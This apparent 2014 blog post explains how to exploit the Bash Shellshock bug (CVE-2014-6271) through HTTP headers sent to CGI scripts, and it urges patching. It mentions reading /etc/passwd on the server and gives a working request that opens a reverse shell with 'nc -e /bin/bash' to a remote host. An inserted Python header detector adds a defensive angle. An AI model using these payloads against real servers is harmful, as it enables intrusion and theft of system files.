
Exploiting Shellshock

Oct 1, 2014

A lot of news articles are currently being published about a series of bugs that were recently found in Bash. This post shows how easily a remote exploit can be written for the first of these bugs (CVE-2014-6271).

Let us first try to understand how this exploit works. The example test code for checking whether a bash installation is vulnerable, which can be found on many sites, is the following:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If this code is executed on a vulnerable system, the output will be:

vulnerable
this is a test

The command "env" is used to set a specific variable (in this example "$x") in the environment before our test command "echo this is a test" is executed. The vulnerability is that bash interprets the string "() {" at the start of the variable's value as the start of a function definition and, while importing that function, also executes the commands that follow the function body, before the desired command is run. Note that the name of the variable does not matter for the vulnerability to work.

Let us look at how this can be used to remotely exploit a web server that uses bash scripts to deliver web pages. To investigate what happens here, we set up a small CGI script with the following content:

#!/bin/bash
echo
env

If we browse to this page, we get a listing of all environment variables that are set while our web page is generated. Let us browse to this page again, this time setting some extra HTTP headers beforehand. I used the Firefox add-on "Modify Headers" to add the two HTTP headers Foo: bar and Cookie: spam=ham.


The response shows that several headers coming from the client are set as environment variables during execution. Into each of these variables we can inject malicious code. This code is executed before the web page is delivered, regardless of whether the variable is used by the script or not. Let us assume the web server executes the following Hello-World web page:

#!/bin/bash
echo
echo "Hello World!"


Note that the web page itself does not use any user input at all; it just statically prints "Hello World!". However, as we have seen before, bash still evaluates our input.

We can first try to inject the example test code. Note that we have to add an empty "echo" to the example so that the output ends up in the body of the HTTP response (Apache would otherwise interpret it as a response header).


Instead of doing a simple echo, we can execute arbitrary code on the server, such as "cat /etc/passwd".


And of course open a reverse shell:

% echo |nc 192.168.122.27 80 <<EOF
GET /cgi-bin/bash.cgi HTTP/1.1
Host: foo
Foo: () { :; }; /bin/nc -e /bin/bash 192.168.122.1 2222;

EOF
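As an added defensive example (not part of the original post), the following Python script parses a raw request like the one above, maps each header to the HTTP_* environment variable a CGI server derives from it, and flags any value that starts with the "() {" function-definition prefix described earlier. The two sample requests are constructed for this example; the helper names are my own.

```python
import re
from typing import Dict, List, Tuple

# Value shape that triggers CVE-2014-6271: a bash function definition "() {"
# at the start of the value, with further commands appended after the body.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

def parse_request_headers(raw: str) -> Dict[str, str]:
    """Parse the header block of a raw HTTP request. The request line is
    skipped and the first empty line ends the header block."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers

def cgi_env_name(header: str) -> str:
    """Environment variable a CGI server derives from a header (RFC 3875):
    prefix HTTP_, upper case, '-' replaced by '_'."""
    return "HTTP_" + header.strip().upper().replace("-", "_")

def find_shellshock_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (env_var, value) for every header whose value bash would parse
    as a function definition, i.e. every header carrying a Shellshock probe."""
    return [(cgi_env_name(name), value)
            for name, value in parse_request_headers(raw).items()
            if SHELLSHOCK_RE.match(value)]

# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "GET /cgi-bin/bash.cgi HTTP/1.1\r\n"
    "Host: foo\r\n"
    "Foo: bar\r\n"
    "Cookie: spam=ham\r\n"
    "\r\n"
)
PROBE_REQUEST = (
    "GET /cgi-bin/bash.cgi HTTP/1.1\r\n"
    "Host: foo\r\n"
    "User-Agent: () { :;}; echo vulnerable\r\n"
    "Cookie: spam=ham\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for req in (BENIGN_REQUEST, PROBE_REQUEST):
        print(find_shellshock_headers(req))
```

The same check can be run over the header fields recorded in a web server's access log; it only tells you that a payload arrived, not whether the bash on the host was still unpatched.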

I hope everyone now understands that Shellshock can be exploited very easily. Patches are available and should be installed as soon as possible.
